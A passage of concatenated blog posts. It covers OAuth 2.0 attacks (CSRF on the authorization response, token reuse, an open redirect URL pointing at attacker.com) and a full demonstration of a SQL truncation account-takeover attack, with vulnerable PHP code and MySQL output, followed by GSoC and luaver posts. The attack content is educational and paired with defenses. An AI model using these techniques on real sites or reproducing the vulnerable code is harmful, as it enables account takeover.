<p>To prevent the attack for <em>Authorization code grant</em>, OAuth already specifies the following in the standard for an access token request:</p>
<blockquote>
<p>The authorization server MUST:</p>
<ul>
<li>ensure that the “redirect_uri” parameter is present if the “redirect_uri” parameter was included in the initial authorization request as described in Section 4.1.1, and if included ensure that their values are identical.</li>
</ul>
</blockquote>
<p>With this, the attacker will be unable to perform Step 5. The client will request for an access token with <em>authentication_code</em> and authentic <em>redirect_uri</em> which will not match with <code class="highlighter-rouge">https://client.com/vuln</code>. Hence, the authorization server will not grant an access token. However, developers rarely take this into consideration. Individually, this does not represent any real threat, but with other vulnerabilities(as mentioned above), this can lead to leaking of <em>access tokens</em>. Note that, this will not prevent attacking authorization servers using <em>Implicit grant</em>.</p>
<p>Another protective measure, which in my opinion is more <em>secure</em> and handles both the above cases is that the authorization server should <strong>whitelist</strong> a list of <em>redirect_uri</em>. Also, while sanitizing this parameter, <strong>exact</strong> matches should be made instead of partial matches. Usually, clients have predefined <em>redirect_uri</em> and they rarely need to change them.</p>
<blockquote>
<h3 id="csrf-on-authorization-response">CSRF on Authorization response</h3>
</blockquote>
<p>By performing a Cross Site Request Forgery attack, an attacker can link a dummy account on <em>Provider</em> with victim’s account on <em>Client</em>(as mentioned in the first attack). This attack uses the 3rd request of the Authorization code grant.</p>
<p><strong>Steps</strong>:</p>
<ol>
<li>
<p>The attacker creates a dummy account on <em>Provider</em>.</p>
</li>
<li>
<p>The attacker initiates the ‘Connect’ process with the Client using the dummy account on the Provider, but, stops the redirect mentioned in request 3(in the Authorization code grant flow). i.e. The attacker has granted <em>Client</em> access to his/her resources on the <em>Provider</em> but the <em>Client</em> has not yet been notified. The attacker saves the <em>authorization_code</em>.</p>
</li>
<li>
<p>The attacker forces the victim to make a request to: <code class="highlighter-rouge">https://client.com/<provider>/login?code=AUTH_CODE</code>. This can be easily done by making the victim opening a malicious webpage with any <em>img</em> or <em>script</em> tag with the above URL as <em>src</em>.</p>
</li>
<li>
<p>If the victim is logged in <em>Client</em>, the attacker’s dummy account is now connected to his/her account.</p>
</li>
<li>
<p>Now, the attacker can log in to the victim’s account on <em>Client</em> by signing in with the dummy account on <em>Provider</em>.</p>
</li>
</ol>
<p><strong>Mitigation</strong></p>
<p>OAuth 2.0 provides security against such attacks through the <code class="highlighter-rouge">state</code> parameter passed in the 2nd and 3rd request. It acts like a CSRF token. The attacker cannot forge a malicious URL without knowing the <code class="highlighter-rouge">state</code> which is user session specific. However, in the current implementation of OAuth, this parameter is <strong>NOT</strong> required and is optional. Developers not well versed with security are susceptible to ignore this.</p>
<p>OAuth 2.0 should force clients to send a <code class="highlighter-rouge">state</code> parameter and handle requests that are missing this parameter as ‘error requests’. Proper guidelines should also be given for generating and handling csrf tokens.</p>
<p><em>Note: Using the <code class="highlighter-rouge">state</code> parameter does not prevent the first attack mentioned above(Attacking the ‘Connect’ request).</em></p>
<blockquote>
<h3 id="reusing-an-access-token---one-access_token-to-rule-them-all">Reusing an access token - One access_token to rule them all</h3>
</blockquote>
<p>OAuth 2.0 considers <em>access_token</em> to be independent of any client. All it ensures is that an <em>access_token</em> stored on the authorization server is mapped to appropriate <em>scopes</em> and <em>expiration time</em>. An access token generated for <em>client1</em> can be used for <em>client2</em> as well. This poses a danger to clients using the <em>Implicit grant</em>.</p>
<p><strong>Steps</strong>:</p>
<ol>
<li>
<p>The attacker creates an authentic client application <em>client1</em> and registers it with a <em>Provider</em>.</p>
</li>
<li>
<p>The attacker somehow manages to get the victim use <em>client1</em>. Thereby, he/she has access to the <em>access token</em> of the victim on <em>client1</em>.</p>
</li>
<li>
<p>Assume that the victim uses <em>client2</em> which further uses the <em>Implicit grant</em>. In <em>Implicit grant</em>, the authorization server redirects the user-agent to a URL such as: <code class="highlighter-rouge">https://client2.com/callback#access_token=ACCESS_TOKEN</code>. The attacker visits this URL with the <em>access_token</em> of the client.</p>
</li>
<li>
<p><em>client2</em> authenticates the attacker as the victim. Hence, a single access token can be used on many different clients that use <em>Implicit grant</em>.</p>
</li>
</ol>
<p><strong>Mitigation</strong></p>
<p>Clients must ensure that the access token being used was indeed issued by them. Some OAuth server like Facebook, provide endpoints to get the __ a particular <em>access_token</em> was issued to: <code class="highlighter-rouge">https://graph.facebook.com/app?fields=id&access_token=ACCESS_TOKEN</code>.</p>
<blockquote>
<h3 id="open-redirect-in-oauth-20">Open Redirect in OAuth 2.0</h3>
</blockquote>
<p>The OAuth 2.0 standard specifies the following guidelines for handling errors in Authorization requests:</p>
<blockquote>
<p>If the request fails due to a missing, invalid, or mismatching redirection URI, or if the client identifier is missing or invalid, the authorization server SHOULD inform the resource owner of the error and MUST NOT automatically redirect the user-agent to the invalid redirection URI.</p>
<p>If the resource owner denies the access request or if the request fails for reasons other than a missing or invalid redirection URI, the authorization server informs the client by adding the following parameters to the query component of the redirection URI using the “application/x-www-form-urlencoded” format, per Appendix B:</p>
</blockquote>
<p>Some OAuth servers, misinterpret this and interchange the order of the two checks. That is, if the request fails for reasons other than <em>redirection URI</em>, such as invalid scope, the server informs the client by redirecting it to the URL passed by the client without validating it. This makes the OAuth server to serve as an open redirector. A possible URL crafted by the attacker can be <code class="highlighter-rouge">https://provider.com/oauth/authorize?response_type=code&client_id=CLIENT_ID&scope=INVALID_SCOPE&redirect_uri=http://attacker.com/</code>.</p>
<p>This vulnerability was once <a href="http://blog.intothesymmetry.com/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html">present</a> in Facebook, Microsoft, and Google.</p>
<p><strong>Mitigation</strong></p>
<p>The mitigation is trivial: the authorization server should first validate the <em>redirect_uri</em> parameter and continue accordingly.</p>
<blockquote>
<h2 id="conclusion">Conclusion</h2>
</blockquote>
<p>In short, while developing an OAuth server, security should be kept in mind. Knowledge about various attack vectors is necessary. The OAuth specification <em>should</em> be updated to enforce the appropriate security measures mentioned above. <a href="https://sakurity.com/oauth">Oauth by Sakurity</a> is a great improvement over OAuth 2.0.</p>
<p>This list is not complete. If you know of any other attacks or even better ways to mitigate the above-mentioned attacks feel free to comment!</p>
SQL Attack (Constraint-based)2016-12-25T00:00:00+00:00https://dhavalkapil.com/blogs/SQL-Attack-Constraint-Based<blockquote>
<h2 id="introduction">Introduction</h2>
</blockquote>
<p>It is good to know that nowadays, developers have started paying attention to security while building websites. Almost everyone is aware of <a href="https://www.owasp.org/index.php/SQL_Injection">SQL Injection</a>. Herein, I would like to discuss another kind of vulnerability related to SQL databases which is as dangerous as SQL Injection, and yet not as common. I shall demonstrate the attack and discuss various defense strategies.</p>
<p><em>Disclaimer</em>: This post is <strong>NOT</strong> about SQL Injection.</p>
<blockquote>
<h2 id="background">Background</h2>
</blockquote>
<p>Recently, I came across an interesting piece of code. The developer had tried to make every possible attempt to secure access to the database. The following code is run whenever a new user tries to register:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><?php</span>
<span class="c1">// Checking whether a user with the same username exists
</span><span class="nv">$username</span> <span class="o">=</span> <span class="nb">mysql_real_escape_string</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]);</span>
<span class="nv">$password</span> <span class="o">=</span> <span class="nb">mysql_real_escape_string</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'password'</span><span class="p">]);</span>
<span class="nv">$query</span> <span class="o">=</span> <span class="s2">"SELECT *
FROM users
WHERE username='</span><span class="nv">$username</span><span class="s2">'"</span><span class="p">;</span>
<span class="nv">$res</span> <span class="o">=</span> <span class="nb">mysql_query</span><span class="p">(</span><span class="nv">$query</span><span class="p">,</span> <span class="nv">$database</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="nb">mysql_num_rows</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// User exists, exit gracefully
</span> <span class="o">.</span>
<span class="o">.</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="c1">// If not, only then insert a new entry
</span> <span class="nv">$query</span> <span class="o">=</span> <span class="s2">"INSERT INTO users(username, password)
VALUES ('</span><span class="nv">$username</span><span class="s2">','</span><span class="nv">$password</span><span class="s2">')"</span><span class="p">;</span>
<span class="o">.</span>
<span class="o">.</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>To check login, the following code is used:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><?php</span>
<span class="nv">$username</span> <span class="o">=</span> <span class="nb">mysql_real_escape_string</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]);</span>
<span class="nv">$password</span> <span class="o">=</span> <span class="nb">mysql_real_escape_string</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'password'</span><span class="p">]);</span>
<span class="nv">$query</span> <span class="o">=</span> <span class="s2">"SELECT username FROM users
WHERE username='</span><span class="nv">$username</span><span class="s2">'
AND password='</span><span class="nv">$password</span><span class="s2">' "</span><span class="p">;</span>
<span class="nv">$res</span> <span class="o">=</span> <span class="nb">mysql_query</span><span class="p">(</span><span class="nv">$query</span><span class="p">,</span> <span class="nv">$database</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="nb">mysql_num_rows</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span><span class="p">){</span>
<span class="nv">$row</span> <span class="o">=</span> <span class="nb">mysql_fetch_assoc</span><span class="p">(</span><span class="nv">$res</span><span class="p">);</span>
<span class="k">return</span> <span class="nv">$row</span><span class="p">[</span><span class="s1">'username'</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">Null</span><span class="p">;</span>
</code></pre></div></div>
<p>Security considerations?</p>
<ul>
<li>
<p>Filter user input parameters? - <strong>CHECK</strong></p>
</li>
<li>
<p>Use single quotes(‘) for additional security? - <strong>CHECK</strong></p>
</li>
</ul>
<p>Cool, what could go wrong?</p>
<p>Well, the attacker can log in as <strong>ANY</strong> user!</p>
<blockquote>
<h2 id="the-attack">The Attack</h2>
</blockquote>
<p>It is crucial to understand a few points before talking about the attack.</p>
<ol>
<li>
<p>While performing string handling in SQL, whitespace characters at the end of the string are removed. In other words, <code class="highlighter-rouge">'vampire'</code> is treated similarly to <code class="highlighter-rouge">'vampire '</code>. This is true for most of the cases, such as strings in WHERE clause or in INSERT statements. For eg., the following query shall return results with even username as <code class="highlighter-rouge">'vampire'</code>.</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">WHERE</span> <span class="n">username</span><span class="o">=</span><span class="s1">'vampire '</span><span class="p">;</span>
</code></pre></div> </div>
<p>Exceptions do exist such as the LIKE clause. Note that this trimming of trailing whitespaces is done mostly during ‘string comparison’. This is because, <a href="https://support.microsoft.com/en-in/kb/316626">internally</a>, SQL pads one of the strings with whitespaces so that their length matches before comparing them.</p>
</li>
<li>
<p>In any INSERT query, SQL enforces maximum length constraints on <code class="highlighter-rouge">varchar(n)</code> by just using the first ‘n’ characters of the string(in case the length of the string is more than ‘n’ characters). e.g. if a particular column has a length constraint of ‘5’ characters, then inserting ‘vampire’ will result in the insert of only ‘vampi’.</p>
</li>
</ol>
<p>Now, let us setup a testing database to demonstrate the attack.</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">vampire</span><span class="o">@</span><span class="n">linux</span><span class="p">:</span><span class="o">~</span><span class="err">$</span> <span class="n">mysql</span> <span class="o">-</span><span class="n">u</span> <span class="n">root</span> <span class="o">-</span><span class="n">p</span>
<span class="n">mysql</span><span class="o">></span> <span class="k">CREATE</span> <span class="k">DATABASE</span> <span class="n">testing</span><span class="p">;</span>
<span class="n">Query</span> <span class="n">OK</span><span class="p">,</span> <span class="mi">1</span> <span class="k">row</span> <span class="n">affected</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">03</span> <span class="n">sec</span><span class="p">)</span>
<span class="n">mysql</span><span class="o">></span> <span class="n">USE</span> <span class="n">testing</span><span class="p">;</span>
<span class="k">Database</span> <span class="n">changed</span>
</code></pre></div></div>
<p>I am going to create a table <code class="highlighter-rouge">users</code> with two columns, <code class="highlighter-rouge">username</code> and <code class="highlighter-rouge">password</code>. Both of these fields will be limited to 25 characters. Next, I will insert a dummy row with ‘vampire’ as the username and ‘my_password’ as the password.</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">mysql</span><span class="o">></span> <span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">users</span> <span class="p">(</span>
<span class="o">-></span> <span class="n">username</span> <span class="n">varchar</span><span class="p">(</span><span class="mi">25</span><span class="p">),</span>
<span class="o">-></span> <span class="n">password</span> <span class="n">varchar</span><span class="p">(</span><span class="mi">25</span><span class="p">)</span>
<span class="o">-></span> <span class="p">);</span>
<span class="n">Query</span> <span class="n">OK</span><span class="p">,</span> <span class="mi">0</span> <span class="k">rows</span> <span class="n">affected</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">09</span> <span class="n">sec</span><span class="p">)</span>
<span class="n">mysql</span><span class="o">></span> <span class="k">INSERT</span> <span class="k">INTO</span> <span class="n">users</span>
<span class="o">-></span> <span class="k">VALUES</span><span class="p">(</span><span class="s1">'vampire'</span><span class="p">,</span> <span class="s1">'my_password'</span><span class="p">);</span>
<span class="n">Query</span> <span class="n">OK</span><span class="p">,</span> <span class="mi">1</span> <span class="k">row</span> <span class="n">affected</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">11</span> <span class="n">sec</span><span class="p">)</span>
<span class="n">mysql</span><span class="o">></span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span><span class="p">;</span>
<span class="o">+</span><span class="c1">----------+-------------+</span>
<span class="o">|</span> <span class="n">username</span> <span class="o">|</span> <span class="n">password</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">----------+-------------+</span>
<span class="o">|</span> <span class="n">vampire</span> <span class="o">|</span> <span class="n">my_password</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">----------+-------------+</span>
<span class="mi">1</span> <span class="k">row</span> <span class="k">in</span> <span class="k">set</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">00</span> <span class="n">sec</span><span class="p">)</span>
</code></pre></div></div>
<p>To demonstrate the trimming of trailing whitespaces, consider the following query:</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">mysql</span><span class="o">></span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span>
<span class="o">-></span> <span class="k">WHERE</span> <span class="n">username</span><span class="o">=</span><span class="s1">'vampire '</span><span class="p">;</span>
<span class="o">+</span><span class="c1">----------+-------------+</span>
<span class="o">|</span> <span class="n">username</span> <span class="o">|</span> <span class="n">password</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">----------+-------------+</span>
<span class="o">|</span> <span class="n">vampire</span> <span class="o">|</span> <span class="n">my_password</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">----------+-------------+</span>
<span class="mi">1</span> <span class="k">row</span> <span class="k">in</span> <span class="k">set</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">00</span> <span class="n">sec</span><span class="p">)</span>
</code></pre></div></div>
<p>Now, assume that a vulnerable website uses the earlier mentioned PHP code to handle user registration and login. To break into any user’s account(in this case ‘vampire’), all that is needed to be done is to register with a username ‘vampire[Many whitespaces]1’ and a random password. The chosen username should be such that the first 25 characters should consist only of ‘vampire’ and whitespaces. This will help in bypassing the query which checks whether a particular username already exists or not.</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">mysql</span><span class="o">></span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span>
<span class="o">-></span> <span class="k">WHERE</span> <span class="n">username</span><span class="o">=</span><span class="s1">'vampire 1'</span><span class="p">;</span>
<span class="n">Empty</span> <span class="k">set</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">00</span> <span class="n">sec</span><span class="p">)</span>
</code></pre></div></div>
<p>Note that while running SELECT queries, SQL <strong><em>does not</em></strong> shorten the string to 25 characters. Hence, the complete string is searched and no result is obtained. Next, when an INSERT query is run, only the first 25 characters are inserted.</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">mysql</span><span class="o">></span> <span class="k">INSERT</span> <span class="k">INTO</span> <span class="n">users</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
<span class="o">-></span> <span class="k">VALUES</span> <span class="p">(</span><span class="s1">'vampire 1'</span><span class="p">,</span> <span class="s1">'random_pass'</span><span class="p">);</span>
<span class="n">Query</span> <span class="n">OK</span><span class="p">,</span> <span class="mi">1</span> <span class="k">row</span> <span class="n">affected</span><span class="p">,</span> <span class="mi">1</span> <span class="n">warning</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">05</span> <span class="n">sec</span><span class="p">)</span>
<span class="n">mysql</span><span class="o">></span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span>
<span class="o">-></span> <span class="k">WHERE</span> <span class="n">username</span><span class="o">=</span><span class="s1">'vampire'</span><span class="p">;</span>
<span class="o">+</span><span class="c1">---------------------------+-------------+</span>
<span class="o">|</span> <span class="n">username</span> <span class="o">|</span> <span class="n">password</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">---------------------------+-------------+</span>
<span class="o">|</span> <span class="n">vampire</span> <span class="o">|</span> <span class="n">my_password</span> <span class="o">|</span>
<span class="o">|</span> <span class="n">vampire</span> <span class="o">|</span> <span class="n">random_pass</span> <span class="o">|</span>
<span class="o">+</span><span class="c1">---------------------------+-------------+</span>
<span class="mi">2</span> <span class="k">rows</span> <span class="k">in</span> <span class="k">set</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">00</span> <span class="n">sec</span><span class="p">)</span>
</code></pre></div></div>
<p>Great, now there are two users which will be returned when searching for ‘vampire’. Note that the second username is actually ‘vampire’ plus 18 trailing whitespaces. Now, if logged in with ‘vampire’ and ‘random_pass’, any SELECT query that searches by the username will return the first and the original entry. This will enable the attacker to log in as the original user.</p>
<p>This attack has been successfully tested on MySQL and SQLite. I believe it works in other cases as well.</p>
<blockquote>
<h2 id="defenses">Defenses</h2>
</blockquote>
<p>Clearly, this is a major vulnerability and needs to be taken care of while developing secure software. A few of the defense measures that can be taken are as follows:</p>
<ol>
<li>
<p>UNIQUE constraint should be added to columns which are required/expected to be unique. This actually is a very important rule concerning software development. Even if your code tries to maintain integrity, always define your data properly. With a UNIQUE constraint on ‘username’, inserting another entry will not be possible. Both the strings will be detected equal and the INSERT query will fail.</p>
</li>
<li>
<p>Always prefer using ‘id’ as the primary key for your database table. Also, data should be tracked by their id within the program.</p>
</li>
<li>
<p>For added security, you can also manually trim input parameters to a particular length(as set in the database).</p>
</li>
</ol>
Elasticsearch Lua II2016-08-16T00:00:00+00:00https://dhavalkapil.com/blogs/Elasticsearch-Lua-GSOC-2016<p>This post is about my <a href="https://summerofcode.withgoogle.com/projects/#5987313834262528">GSoC</a> project, that I worked on during summer, 2016. I worked under the <a href="http://www.lua.inf.puc-rio.br">LabLua</a> organization on adding a test suite and improving documentation for elasticsearch-lua. <a href="https://github.com/DhavalKapil/elasticsearch-lua">elasticsearch-lua</a>.</p>
<blockquote>
<h2 id="introduction">Introduction</h2>
</blockquote>
<p><a href="https://www.elastic.co/products/elasticsearch">Elasticsearch</a> is a distributed, scalable and full-text search engine based on Lucene. It provides an HTTP web interface and handles JSON documents. It is presently <a href="http://db-engines.com/en/ranking/search+engine">ranked 1</a> in the category of ‘Search engines’.</p>
<p><a href="https://github.com/DhavalKapil/elasticsearch-lua">elasticsearch-lua</a> is a client for Elasticsearch that provides a wrapper over the REST interface for the Lua Programming Language. I developed it as part of <a href="https://www.google-melange.com/archive/gsoc/2015/orgs/lablua/projects/dhavalkapil.html">GSoC 2015</a> with my mentor <a href="https://github.com/pmusa">Pablo Musa</a>.</p>
<p>My GSoC project this year was entitled ‘Improve elasticsearch-lua tests and builds’ and was a continuation of the work that I had done last year. Apart from adding a test suite for <code class="highlighter-rouge">elasticsearch-lua</code> and making it robust, I also decided to work on the documentation of the code.</p>
<blockquote>
<h2 id="test-suite-for-elasticsearch-lua">Test suite for elasticsearch-lua</h2>
</blockquote>
<p>The tests are divided into unit, integration and stress tests. Note that all these tests run for Lua 5.1, 5.2, 5.3 and LuaJIT 2.0. Code coverage is measured for unit tests and integration tests. <a href="https://coveralls.io/github/DhavalKapil/elasticsearch-lua">Coveralls</a> was chosen to measure and maintain code coverage. As of now, around 91% of the code is covered with tests.</p>
<blockquote>
<h3 id="unit-tests">Unit Tests</h3>
</blockquote>
<p>There are many different modules within <code class="highlighter-rouge">elasticsearch-lua</code>. For every such module, there is a corresponding unit test written. Unit tests can be found in <code class="highlighter-rouge">tests/</code> directory. Care was taken to test extensively all the endpoints. Some key points to note:</p>
<ul>
<li>
<p>Some modules were ‘<a href="http://stackoverflow.com/questions/2665812/what-is-mocking">mocked</a>’ to intercept external calls.</p>
</li>
<li>
<p>Not only return values (success or failure) but every internal parameter was ‘deep’ checked. Deep check involves checking each nested parameter recursively. For example, a lua table might have another table inside it.</p>
</li>
<li>
<p><a href="https://travis-ci.org/DhavalKapil/elasticsearch-lua">Travis</a> was chosen for continuous integrations. Everytime code is pushed, a build is triggered on travis and unit tests are run. Success or failure status is reported back.</p>
</li>
<li>
<p>A number of bugs (pertaining to generating of target url for endpoint, and listing source files in the rockspec file) were found by running the tests. All were fixed.</p>
</li>
</ul>
<p>The diff of changes due to unit tests can be seen <a href="https://github.com/dhavalkapil/elasticsearch-lua/compare/5bab5d0a73ecee82db6f64584a0cc38176e3d216...dhavalkapil:61220c1625253e8d72a3e2e1cc108e7b5db01af4">here</a>.</p>
<blockquote>
<h3 id="integration-tests">Integration Tests</h3>
</blockquote>
<p>Apart from the test of every component individually, it is equally important that they work together while interacting with each other. To make <code class="highlighter-rouge">elasticsearch-lua</code> robust, it was necessary to add some integration tests.</p>
<ul>
<li>
<p>Integration tests involve calling an API function in a real environment and testing parameters at every point. <a href="https://github.com/DhavalKapil/elasticsearch-lua/blob/master/tests/lib/operations.lua">Wrappers</a> for some API functions were developed so as to avoid repeated code.</p>
</li>
<li>
<p>We believe that using real data for integration tests is always a good practice. Also, the test dataset should stress the system a bit and, thus, it should not be very small. Therefore, we opted by using part of the data available freely from <a href="https://www.githubarchive.org/">www.githubarchive.org</a>. A mirror is maintained <a href="https://dhavalkapil.com/elasticsearch-test-dataset/dataset/2015-01-01-15.json.gz">here</a>. The dataset is not a part of the main repository due to size, so it is downloaded on the fly while running tests on travis.</p>
</li>
<li>
<p>Common operations (such as search, index, get, delete and bulk) were tested in a single run. These operations are intermixed together.</p>
</li>
</ul>
<p>The diff of changes due to integration tests can be seen <a href="https://github.com/dhavalkapil/elasticsearch-lua/compare/8216f944d45e5b1da2710716b6b9eb980330f432...dhavalkapil:822990f5878094fad2db5e3519b96036b6afb32b">here</a>.</p>
<blockquote>
<h3 id="stress-tests">Stress Tests</h3>
</blockquote>
<p>Stress tests involve testing elasticsearch-lua limits. By having these tests, the client will be able to prove its stability in an effective manner.</p>
<ul>
<li>
<p>A separate framework for stress testing was designed, considering that it might take a few hours to finish. In short, every successful (unit + integration tests) build triggers a new build, which runs the stress tests, provided that no such build is already running.</p>
</li>
<li>
<p>The status of stress tests is reported through a separate badge in the <a href="https://github.com/dhavalkapil/elasticsearch-lua">README</a>.</p>
</li>
</ul>
<p>The diff of changes due to stress tests can be seen <a href="https://github.com/dhavalkapil/elasticsearch-lua/compare/768e4bee6e26f7f5ca902b21314b9d60947d7873...dhavalkapil:e59f095896c43f8f419bc1847c53d47c3824fa12">here</a>.</p>
<blockquote>
<h2 id="documentation">Documentation</h2>
</blockquote>
<p>Having a good documentation is very important for any library. It helps developers to understand functionalities without having to investigate the code. Moreover, it helps the library adoption as new developers can use it as a guide to get started. Although this was initially not a task for the GSOC project, after realizing its importance, I opted to invest a lot of time in the documentation and added it to the GSoC project timeline.</p>
<blockquote>
<h3 id="guides">Guides</h3>
</blockquote>
<p>The guides consist of documents and tutorials that help developers to install, use and customize elasticsearch-lua. The guides explain the most frequently used functionalities along with some internals. These pages are hosted <a href="http://elasticsearch-lua.readthedocs.io/en/latest/">here</a>.</p>
<blockquote>
<h3 id="api-documentation">API Documentation</h3>
</blockquote>
<p>The API Documentation lists all possible functions provided by the elasticsearch-lua. Each function name is accompanied by the parameters that it accepts. The API documentation is published <a href="https://dhavalkapil.com/elasticsearch-lua/docs/">here</a>.</p>
<p>The diff of changes pertaining to documentation can be seen <a href="https://github.com/dhavalkapil/elasticsearch-lua/compare/04d33706890a64c4247ad73e1430fad6f8b8d681...dhavalkapil:9fa3d1a7cde5fa357b6c54e69cae2a0ba6c8d0d9">here</a>.</p>
<blockquote>
<h2 id="additional-tasks-not-part-of-gsoc">Additional tasks (Not part of GSoC)</h2>
</blockquote>
<p>Apart from the tasks mentioned above, I worked on the following as well:</p>
<blockquote>
<h3 id="luaver">Luaver</h3>
</blockquote>
<p>While working with <code class="highlighter-rouge">elasticsearch-lua</code>, I had to frequently switch between different versions of lua while developing the test suite. Switching is not simple and I faced the following issues often:</p>
<ol>
<li>
<p>Building different lua versions required some effort such as downloading the version source, unzipping, installing and managing any dependency faced. Also, the previous version had to be deleted completely in order to avoid any ambiguity.</p>
</li>
<li>
<p>Luarocks installation depends on the Lua version. Switching lua versions can mess up the installed rocks.</p>
</li>
<li>
<p>To solve these issues I used workaround methods, such as editing the source code of some existing rocks.</p>
</li>
<li>
<p>Sometimes, these code changes broke the entire rock. In such cases, I had to remove all existing rocks, rebuild luarocks and then reinstall the needed rocks.</p>
</li>
</ol>
<p>As I was already familiar with NodeJS and Ruby and understood how such problems were addressed by <a href="https://github.com/creationix/nvm">nvm</a> and <a href="https://github.com/rvm/rvm">rvm</a>, I decided to create a similar tool for lua, and that is how <a href="https://dhavalkapil.com/luaver">luaver</a> was born.</p>
<p>I also wrote a separate <a href="/blogs/Lua-Version-Manager">blog</a> post about luaver and you can support the project <a href="https://gratipay.com/luaver/">here</a>. Initially, I didn’t expect to spend much time on it and figured that I could manage both GSoC and develop luaver simultaneously. However, at some point in time, I got too involved in luaver which resulted in me getting one week behind the timeline that I had proposed for GSoC. Nevertheless, I covered it up soon.</p>
<blockquote>
<h3 id="updating-elasticsearch-lua">Updating elasticsearch-lua</h3>
</blockquote>
<p>It is important that the client implements all the features provided by Elasticsearch. Also, Elasticsearch is evolving a lot and releasing in a fast pace, so it is important that clients are also up-to-date. Some features were missing and the client version was 1.6 while Elasticsearch is in 2.3. Therefore, I decided to update existing features and implement some missing features.</p>
<blockquote>
<h2 id="benefits-of-working-on-the-same-project-for-two-consecutive-years">Benefits of working on the same project for two consecutive years</h2>
</blockquote>
<ol>
<li>
<p>I myself had written the client. The codebase was already at my finger-tips. I could spend more time working than understanding and getting comfortable with the code.</p>
</li>
<li>
<p>I wanted to further consolidate my client and make it stable. I couldn’t get much time during the rest of the year to work full-fledged on the development. Google Summer of Code offered a nice incentive.</p>
</li>
<li>
<p>I had already worked with the Lua community. Being in familiar environment, I was able to work and think freely. <a href="https://dhavalkapil.com/luaver">luaver</a> was created to benefit the open source Lua community. If this was my first time I wouldn’t even have thought about developing it.</p>
</li>
</ol>
Lua Version Manager2016-07-03T00:00:00+00:00https://dhavalkapil.com/blogs/Lua-Version-Manager<p>This post is about installing and maintaining multiple versions of Lua, LuaJIT, and Luarocks using luaver. This is perhaps the easiest and the most systematic way to go about installing any of the above.</p>
<blockquote>
<h2 id="introducing-lua-version-manager-luaver">Introducing Lua Version Manager (luaver)</h2>
</blockquote>
<p>Lua Version Manager or <a href="https://dhavalkapil.com/luaver/">luaver</a> allows you to easily install and switch between multiple versions of lua, luajit, and luarocks in a seamless and consistent manner. The source code is on <a href="https://github.com/DhavalKapil/luaver">Github</a>.</p>
<blockquote>
<h3 id="motivation">Motivation</h3>
</blockquote>
<p>I was working on a few projects involving lua such as <a href="github.com/DhavalKapil/elasticsearch-lua">elasticsearch-lua</a> and the <a href="https://github.com/sailorproject/sailor">sailor</a> web framework. Therein, I frequently had to shift between different versions of Lua to manage dependencies as well as for testing purposes. The following issues motivated me to create <a href="https://dhavalkapil.com/luaver/">luaver</a>:</p>
<ol>
<li>
<p>Building different lua versions required some effort as I had to frequently shift between them.</p>
</li>
<li>
<p>Luarocks installation depends on the Lua version. Switching lua versions can mess up the installed rocks.</p>
</li>
<li>
<p>To solve these issues I used workaround methods such as editing the source code of some existing rocks.</p>
</li>
<li>
<p>Sometimes, these code changes broke the entire rock. In such cases, I had to remove all existing rocks, rebuild luarocks and then reinstall the needed rocks.</p>
</li>
</ol>
<p>I was already familiar with NodeJS and Ruby and understood how such problems were addressed by <a href="https://github.com/creationix/nvm">nvm</a> and <a href="https://github.com/rvm/rvm">rvm</a>.</p>
<blockquote>
<h2 id="installing-lua-luajit-luarocks-with-luaver">Installing Lua, LuaJIT, Luarocks with luaver</h2>
</blockquote>
